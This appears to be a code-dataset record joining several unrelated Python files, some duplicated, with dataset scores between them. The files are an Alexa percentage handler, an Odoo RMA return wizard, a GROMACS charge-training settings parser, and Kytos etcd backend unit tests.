mqtt_topic_set, mqtt_topic_get = get_mqtt_topics_from_request(request)
message_id = get_request_message_id(request)
resp_payload = MQTTClient.publish_wait_for_resp(
mqtt_topic_set, {"messageId": message_id, "status": {key: value}}, message_id, mqtt_topic_get)
if resp_payload is None:
return error_response(request)
percentage = None
status = resp_payload.get("status")
if status:
percentage = status.get("percentage")
if percentage is not None:
return PercentageController.__response_success(request, percentage)
return error_response(request)
@staticmethod
def __response_success(request, percentage):
payload = {
"context": {
"properties": [
{
"namespace": "Alexa.PercentageController",
"name": "percentage",
"value": int(percentage),
"timeOfSample": get_utc_timestamp(),
"uncertaintyInMilliseconds": 0
}
]
}
}
return success_response(request, payload) | 0.610802 | 0.122078 |
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
class ReturnPicking(models.TransientModel):
_inherit = 'stock.return.picking'
create_rma = fields.Boolean(
string="Create RMAs"
)
picking_type_code = fields.Selection(
selection=[
('incoming', 'Vendors'),
('outgoing', 'Customers'),
('internal', 'Internal'),
],
related='picking_id.picking_type_id.code',
store=True,
readonly=True,
)
@api.onchange("create_rma")
def _onchange_create_rma(self):
if self.create_rma:
warehouse = self.picking_id.picking_type_id.warehouse_id
self.location_id = warehouse.rma_loc_id.id
rma_loc = warehouse.search([]).mapped('rma_loc_id')
rma_loc_domain = [('id', 'child_of', rma_loc.ids)]
else:
self.location_id = self.default_get(['location_id'])['location_id']
rma_loc_domain = [
'|',
('id', '=', self.picking_id.location_id.id),
('return_location', '=', True),
]
return {'domain': {'location_id': rma_loc_domain}}
def create_returns(self):
""" Override create_returns method for creating one or more
'confirmed' RMAs after return a delivery picking in case
'Create RMAs' checkbox is checked in this wizard.
New RMAs will be linked to the delivery picking as the origin
delivery and also RMAs will be linked to the returned picking
as the 'Receipt'.
"""
if self.create_rma:
# set_rma_picking_type is to override the copy() method of stock
# picking and change the default picking type to rma picking type
self_with_context = self.with_context(set_rma_picking_type=True)
res = super(ReturnPicking, self_with_context).create_returns()
partner = self.picking_id.partner_id
if not partner:
raise ValidationError(_(
"You must specify the 'Customer' in the "
"'Stock Picking' from which RMAs will be created"))
picking = self.picking_id
returned_picking = self.env['stock.picking'].browse(res['res_id'])
if hasattr(picking, 'sale_id') and picking.sale_id:
partner_invoice_id = picking.sale_id.partner_invoice_id.id
else:
partner_invoice_id = partner.address_get(
['invoice']).get('invoice', False),
for move in returned_picking.move_lines:
self.env['rma'].create({
'partner_id': partner.id,
'partner_invoice_id': partner_invoice_id,
'origin': picking.name,
'picking_id': picking.id,
'move_id': move.origin_returned_move_id.id,
'product_id': move.origin_returned_move_id.product_id.id,
'product_uom_qty': move.product_uom_qty,
'product_uom': move.product_uom.id,
'reception_move_id': move.id,
'company_id': move.company_id.id,
'location_id': move.location_dest_id.id,
'state': 'confirmed',
})
return res
else:
return super().create_returns() | rma/setup/rma/odoo/addons/rma/wizard/stock_picking_return.py |
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
class ReturnPicking(models.TransientModel):
_inherit = 'stock.return.picking'
create_rma = fields.Boolean(
string="Create RMAs"
)
picking_type_code = fields.Selection(
selection=[
('incoming', 'Vendors'),
('outgoing', 'Customers'),
('internal', 'Internal'),
],
related='picking_id.picking_type_id.code',
store=True,
readonly=True,
)
@api.onchange("create_rma")
def _onchange_create_rma(self):
if self.create_rma:
warehouse = self.picking_id.picking_type_id.warehouse_id
self.location_id = warehouse.rma_loc_id.id
rma_loc = warehouse.search([]).mapped('rma_loc_id')
rma_loc_domain = [('id', 'child_of', rma_loc.ids)]
else:
self.location_id = self.default_get(['location_id'])['location_id']
rma_loc_domain = [
'|',
('id', '=', self.picking_id.location_id.id),
('return_location', '=', True),
]
return {'domain': {'location_id': rma_loc_domain}}
def create_returns(self):
""" Override create_returns method for creating one or more
'confirmed' RMAs after return a delivery picking in case
'Create RMAs' checkbox is checked in this wizard.
New RMAs will be linked to the delivery picking as the origin
delivery and also RMAs will be linked to the returned picking
as the 'Receipt'.
"""
if self.create_rma:
# set_rma_picking_type is to override the copy() method of stock
# picking and change the default picking type to rma picking type
self_with_context = self.with_context(set_rma_picking_type=True)
res = super(ReturnPicking, self_with_context).create_returns()
partner = self.picking_id.partner_id
if not partner:
raise ValidationError(_(
"You must specify the 'Customer' in the "
"'Stock Picking' from which RMAs will be created"))
picking = self.picking_id
returned_picking = self.env['stock.picking'].browse(res['res_id'])
if hasattr(picking, 'sale_id') and picking.sale_id:
partner_invoice_id = picking.sale_id.partner_invoice_id.id
else:
partner_invoice_id = partner.address_get(
['invoice']).get('invoice', False),
for move in returned_picking.move_lines:
self.env['rma'].create({
'partner_id': partner.id,
'partner_invoice_id': partner_invoice_id,
'origin': picking.name,
'picking_id': picking.id,
'move_id': move.origin_returned_move_id.id,
'product_id': move.origin_returned_move_id.product_id.id,
'product_uom_qty': move.product_uom_qty,
'product_uom': move.product_uom.id,
'reception_move_id': move.id,
'company_id': move.company_id.id,
'location_id': move.location_dest_id.id,
'state': 'confirmed',
})
return res
else:
return super().create_returns() | 0.539954 | 0.132739 |
from GAML.functions import file_size_check, file_gen_new
from GAML.file_gen_gromacstop import File_gen_gromacstop
from GAML.charge_gen_scheme import Charge_gen_scheme
import os
import shutil
from pkg_resources import resource_string
class GAML_autotrain(object):
def __init__(self,*args,**kwargs):
if 'file_path' not in kwargs or kwargs['file_path'] is None:
raise ValueError('no inputs, file_path is missing')
self.file = kwargs['file_path'].strip()
file_size_check(self.file,fsize=2)
if 'fname' in kwargs and kwargs['fname'] is not None:
self.fname = kwargs['fname'].strip()
if len(self.fname) == 0: self.fname = 'bash_GAML_AutoTraining'
else:
self.fname = 'bash_GAML_AutoTraining'
self.parameters = {
'top_gas_path' : None,
'top_liq_path' : None,
'top_fep_path' : None,
'gro_gas_path' : None,
'gro_liq_path' : None,
'gro_fep_path' : None,
'grompp_min_gas_path' : None,
'grompp_min_liq_path' : None,
'grompp_nvt_liq_path' : None,
'grompp_npt_liq_path' : None,
'grompp_prod_gas_path' : None,
'grompp_prod_liq_path' : None,
'grompp_fep_min_steep_path' : None,
'grompp_fep_min_lbfgs_path' : None,
'grompp_fep_nvt_path' : None,
'grompp_fep_npt_path' : None,
'grompp_fep_prod_path' : None,
'charge_range_path' : None,
'gromacs_energy_kw' : 'Density',
'literature_value' : 1000,
'gmx' : 'gmx',
'MAE' : 0.05,
'training_total_nm' : 5,
'training_cnt' : 1,
'gennm' : 10,
'error_tolerance' : 0.5,
'symmetry_list' : None,
'pn_limit' : None,
'counter_list' : None,
'offset_list' : None,
'offset_nm' : None,
'ratio' : None,
'nmround' : None,
'total_charge' : 0.0,
'charge_extend_by' : None,
'threshold' : None,
'bool_neutral' : None,
'bool_nozero' : None,
'bool_abscomp' : None,
'reschoose' : None,
'analysis_begintime' : None,
'analysis_endtime' : None,
}
# check for the bash scripts
bo = True
if 'bashinterfile' in kwargs and kwargs['bashinterfile'] is not None:
self.bashinterfile = kwargs['bashinterfile'].strip()
if len(self.bashinterfile) == 0:
self.bashinterfile = 'GAML-BASH-Interface.sh'
else:
bo = False
else:
self.bashinterfile = 'GAML-BASH-Interface.sh'
if bo:
self.shfile = resource_string(__name__,'scripts/'+self.bashinterfile).decode('utf-8').replace('\r','')
else:
file_size_check(self.bashinterfile,fsize=10)
with open(self.bashinterfile,mode='rt') as f: self.shfile = f.read()
self.profile()
self.proparameters()
self.trial()
def run(self):
"""method place holder"""
pass
def profile(self):
"""Process input auto-settingfile"""
errinfo = 'Error: wrong defined settingfile\n'
parlist = [k for k in self.parameters]
with open(self.file,mode='rt') as f:
while True:
line = f.readline()
if len(line) == 0:
break
sub = line if line.find('#') == -1 else line[:line.find('#')]
sub = sub.strip()
if len(sub) == 0: continue
if sub.find('=') == -1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
lp = sub.split('=',maxsplit=1)
partmp = lp[0].split()
if len(partmp) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
key = partmp[0].lower()
if key not in parlist:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
stmp = lp[1]
lt = stmp.split()
if len(lt) != 0:
# take care of python representation string list to real python list
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
try:
s = eval(stmp)
except:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
self.parameters[key] = s
# special case for bash print out
self.parameters[key + 'RAW'] = stmp.strip()
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
self.parameters[key] = ' '.join(lt)
elif len(lt) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
else:
self.parameters[key] = lt[0]
def proparameters(self):
cwd = os.getcwd()
for par,name in self.parameters.items():
if 'path' in par and name is not None:
filepath = self.parameters[par]
head,base = os.path.split(filepath)
if os.path.isfile(filepath):
if os.path.islink(base) or (not os.path.isfile(base)):
shutil.copy(filepath,cwd)
self.parameters[par] = base
else:
print('Error: cannot find the file ' + self.parameters[par])
raise ValueError('wrong defined')
def trial(self):
# Make a copy and add a key for Charge_gen_scheme
pardir = { **self.parameters }
pardir['charge_path'] = pardir['charge_range_path']
tp = Charge_gen_scheme(**pardir)
tp.run()
pardir['charge_path'] = tp.chargepair
pardir['toppath'] = pardir['top_liq_path']
tp = File_gen_gromacstop(**pardir)
tp.run()
def file_print(self):
pf = file_gen_new(self.fname,fextend='sh')
with open(pf,mode='wt') as f:
f.write('#!/bin/bash\n')
f.write('# -*- coding: utf-8 -*-\n\n')
for key in sorted(self.parameters):
if 'RAW' in key:
pass
elif self.parameters[key] is None:
f.write("{:}= \n".format(key))
else:
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
f.write("{:}='{:}'\n".format(key,self.parameters[key+'RAW']))
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
f.write("{:}='{:}'\n".format(key,self.parameters[key]))
else:
f.write('{:}={:}\n'.format(key,self.parameters[key]))
f.write('\n\n\n')
f.write(self.shfile)
print('Note: new file < {:} >'.format(pf))
print('it can be directly executed for auto-training') | GAML/gaml_autotrain.py | from GAML.functions import file_size_check, file_gen_new
from GAML.file_gen_gromacstop import File_gen_gromacstop
from GAML.charge_gen_scheme import Charge_gen_scheme
import os
import shutil
from pkg_resources import resource_string
class GAML_autotrain(object):
def __init__(self,*args,**kwargs):
if 'file_path' not in kwargs or kwargs['file_path'] is None:
raise ValueError('no inputs, file_path is missing')
self.file = kwargs['file_path'].strip()
file_size_check(self.file,fsize=2)
if 'fname' in kwargs and kwargs['fname'] is not None:
self.fname = kwargs['fname'].strip()
if len(self.fname) == 0: self.fname = 'bash_GAML_AutoTraining'
else:
self.fname = 'bash_GAML_AutoTraining'
self.parameters = {
'top_gas_path' : None,
'top_liq_path' : None,
'top_fep_path' : None,
'gro_gas_path' : None,
'gro_liq_path' : None,
'gro_fep_path' : None,
'grompp_min_gas_path' : None,
'grompp_min_liq_path' : None,
'grompp_nvt_liq_path' : None,
'grompp_npt_liq_path' : None,
'grompp_prod_gas_path' : None,
'grompp_prod_liq_path' : None,
'grompp_fep_min_steep_path' : None,
'grompp_fep_min_lbfgs_path' : None,
'grompp_fep_nvt_path' : None,
'grompp_fep_npt_path' : None,
'grompp_fep_prod_path' : None,
'charge_range_path' : None,
'gromacs_energy_kw' : 'Density',
'literature_value' : 1000,
'gmx' : 'gmx',
'MAE' : 0.05,
'training_total_nm' : 5,
'training_cnt' : 1,
'gennm' : 10,
'error_tolerance' : 0.5,
'symmetry_list' : None,
'pn_limit' : None,
'counter_list' : None,
'offset_list' : None,
'offset_nm' : None,
'ratio' : None,
'nmround' : None,
'total_charge' : 0.0,
'charge_extend_by' : None,
'threshold' : None,
'bool_neutral' : None,
'bool_nozero' : None,
'bool_abscomp' : None,
'reschoose' : None,
'analysis_begintime' : None,
'analysis_endtime' : None,
}
# check for the bash scripts
bo = True
if 'bashinterfile' in kwargs and kwargs['bashinterfile'] is not None:
self.bashinterfile = kwargs['bashinterfile'].strip()
if len(self.bashinterfile) == 0:
self.bashinterfile = 'GAML-BASH-Interface.sh'
else:
bo = False
else:
self.bashinterfile = 'GAML-BASH-Interface.sh'
if bo:
self.shfile = resource_string(__name__,'scripts/'+self.bashinterfile).decode('utf-8').replace('\r','')
else:
file_size_check(self.bashinterfile,fsize=10)
with open(self.bashinterfile,mode='rt') as f: self.shfile = f.read()
self.profile()
self.proparameters()
self.trial()
def run(self):
"""method place holder"""
pass
def profile(self):
"""Process input auto-settingfile"""
errinfo = 'Error: wrong defined settingfile\n'
parlist = [k for k in self.parameters]
with open(self.file,mode='rt') as f:
while True:
line = f.readline()
if len(line) == 0:
break
sub = line if line.find('#') == -1 else line[:line.find('#')]
sub = sub.strip()
if len(sub) == 0: continue
if sub.find('=') == -1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
lp = sub.split('=',maxsplit=1)
partmp = lp[0].split()
if len(partmp) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
key = partmp[0].lower()
if key not in parlist:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
stmp = lp[1]
lt = stmp.split()
if len(lt) != 0:
# take care of python representation string list to real python list
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
try:
s = eval(stmp)
except:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
self.parameters[key] = s
# special case for bash print out
self.parameters[key + 'RAW'] = stmp.strip()
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
self.parameters[key] = ' '.join(lt)
elif len(lt) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
else:
self.parameters[key] = lt[0]
def proparameters(self):
cwd = os.getcwd()
for par,name in self.parameters.items():
if 'path' in par and name is not None:
filepath = self.parameters[par]
head,base = os.path.split(filepath)
if os.path.isfile(filepath):
if os.path.islink(base) or (not os.path.isfile(base)):
shutil.copy(filepath,cwd)
self.parameters[par] = base
else:
print('Error: cannot find the file ' + self.parameters[par])
raise ValueError('wrong defined')
def trial(self):
# Make a copy and add a key for Charge_gen_scheme
pardir = { **self.parameters }
pardir['charge_path'] = pardir['charge_range_path']
tp = Charge_gen_scheme(**pardir)
tp.run()
pardir['charge_path'] = tp.chargepair
pardir['toppath'] = pardir['top_liq_path']
tp = File_gen_gromacstop(**pardir)
tp.run()
def file_print(self):
pf = file_gen_new(self.fname,fextend='sh')
with open(pf,mode='wt') as f:
f.write('#!/bin/bash\n')
f.write('# -*- coding: utf-8 -*-\n\n')
for key in sorted(self.parameters):
if 'RAW' in key:
pass
elif self.parameters[key] is None:
f.write("{:}= \n".format(key))
else:
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
f.write("{:}='{:}'\n".format(key,self.parameters[key+'RAW']))
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
f.write("{:}='{:}'\n".format(key,self.parameters[key]))
else:
f.write('{:}={:}\n'.format(key,self.parameters[key]))
f.write('\n\n\n')
f.write(self.shfile)
print('Note: new file < {:} >'.format(pf))
print('it can be directly executed for auto-training') | 0.164215 | 0.076857 |
from unittest import TestCase
from unittest.mock import MagicMock, patch
from napps.kytos.storehouse.backends.etcd import (Etcd, join_fullname,
split_fullname)
from napps.kytos.storehouse.main import Box
# pylint: disable=protected-access, unused-argument, no-member
class TestEtcd(TestCase):
"""Tests for the Etcd class."""
# pylint: disable=arguments-differ
@patch('napps.kytos.storehouse.backends.etcd.etcd3.client')
def setUp(self, mock_client):
"""Execute steps before each tests."""
mock_client.return_value = MagicMock()
self.base = Etcd()
# 'metadata' is the name of the one of objects obtained at tuple
# returned by the etcd get_all method.
self.metadata = MagicMock()
self.metadata.key = b'namespace.123'
self.base.etcd.get_all.return_value = [(b'', self.metadata)]
def test_get_all_keys(self):
"""Test _get_all_keys method."""
all_keys = self.base._get_all_keys()
self.assertEqual(b'namespace.123', next(all_keys))
@patch('pickle.dumps', return_value='raw_data')
def test_create(self, mock_dumps):
"""Test create method."""
box = Box('any', 'namespace', box_id='123')
self.base.create(box)
self.base.etcd.put.assert_called_with('namespace.123', 'raw_data')
@patch('pickle.loads', return_value='data')
def test_retrieve_success_case(self, mock_loads):
"""Test retrieve method to success case."""
self.base.etcd.get.return_value = ('raw_data', '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertEqual(retrieve, 'data')
def test_retrieve_failure_case(self):
"""Test retrieve method to failure case."""
self.base.etcd.get.return_value = (None, '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertIsNone(retrieve)
def test_delete(self):
"""Test delete method."""
box = Box('any', 'namespace', box_id='123')
self.base.delete(box.namespace, box.box_id)
self.base.etcd.delete.assert_called_with('namespace.123')
def test_list(self):
"""Test list method."""
obj = MagicMock()
obj.key = b'namespace.123'
self.base.etcd.get_prefix.return_value = [('', obj)]
list_return = self.base.list('namespace')
self.base.etcd.get_prefix.assert_called_with('namespace',
keys_only=True)
self.assertEqual(next(list_return), b'123')
def test_list_namespaces(self):
"""Test list_namespaces method."""
namespaces = self.base.list_namespaces()
self.assertEqual(namespaces, {b'namespace'})
@patch('pickle.loads')
def test_backup(self, mock_loads):
"""Test backup method."""
next(self.base.backup())
mock_loads.assert_called_with((b'', self.metadata))
def test_split_fullname(self):
"""Test split_fullname method."""
fullname = b'namespace.box_id'
split = split_fullname(fullname)
self.assertEqual(split, [b'namespace', b'box_id'])
def test_join_fullname(self):
"""Test join_fullname method to binary and string parameters."""
fullname_1 = join_fullname(b'namespace', b'box_id')
self.assertEqual(fullname_1, b'namespace.box_id')
fullname_2 = join_fullname('namespace', 'box_id')
self.assertEqual(fullname_2, 'namespace.box_id') | tests/unit/test_etcd.py | from unittest import TestCase
from unittest.mock import MagicMock, patch
from napps.kytos.storehouse.backends.etcd import (Etcd, join_fullname,
split_fullname)
from napps.kytos.storehouse.main import Box
# pylint: disable=protected-access, unused-argument, no-member
class TestEtcd(TestCase):
"""Tests for the Etcd class."""
# pylint: disable=arguments-differ
@patch('napps.kytos.storehouse.backends.etcd.etcd3.client')
def setUp(self, mock_client):
"""Execute steps before each tests."""
mock_client.return_value = MagicMock()
self.base = Etcd()
# 'metadata' is the name of the one of objects obtained at tuple
# returned by the etcd get_all method.
self.metadata = MagicMock()
self.metadata.key = b'namespace.123'
self.base.etcd.get_all.return_value = [(b'', self.metadata)]
def test_get_all_keys(self):
"""Test _get_all_keys method."""
all_keys = self.base._get_all_keys()
self.assertEqual(b'namespace.123', next(all_keys))
@patch('pickle.dumps', return_value='raw_data')
def test_create(self, mock_dumps):
"""Test create method."""
box = Box('any', 'namespace', box_id='123')
self.base.create(box)
self.base.etcd.put.assert_called_with('namespace.123', 'raw_data')
@patch('pickle.loads', return_value='data')
def test_retrieve_success_case(self, mock_loads):
"""Test retrieve method to success case."""
self.base.etcd.get.return_value = ('raw_data', '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertEqual(retrieve, 'data')
def test_retrieve_failure_case(self):
"""Test retrieve method to failure case."""
self.base.etcd.get.return_value = (None, '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertIsNone(retrieve)
def test_delete(self):
"""Test delete method."""
box = Box('any', 'namespace', box_id='123')
self.base.delete(box.namespace, box.box_id)
self.base.etcd.delete.assert_called_with('namespace.123')
def test_list(self):
"""Test list method."""
obj = MagicMock()
obj.key = b'namespace.123'
self.base.etcd.get_prefix.return_value = [('', obj)]
list_return = self.base.list('namespace')
self.base.etcd.get_prefix.assert_called_with('namespace',
keys_only=True)
self.assertEqual(next(list_return), b'123')
def test_list_namespaces(self):
"""Test list_namespaces method."""
namespaces = self.base.list_namespaces()
self.assertEqual(namespaces, {b'namespace'})
@patch('pickle.loads')
def test_backup(self, mock_loads):
"""Test backup method."""
next(self.base.backup())
mock_loads.assert_called_with((b'', self.metadata))
def test_split_fullname(self):
"""Test split_fullname method."""
fullname = b'namespace.box_id'
split = split_fullname(fullname)
self.assertEqual(split, [b'namespace', b'box_id'])
def test_join_fullname(self):
"""Test join_fullname method to binary and string parameters."""
fullname_1 = join_fullname(b'namespace', b'box_id')
self.assertEqual(fullname_1, b'namespace.box_id')
fullname_2 = join_fullname('namespace', 'box_id')
self.assertEqual(fullname_2, 'namespace.box_id') | 0.81538 | 0.352397 |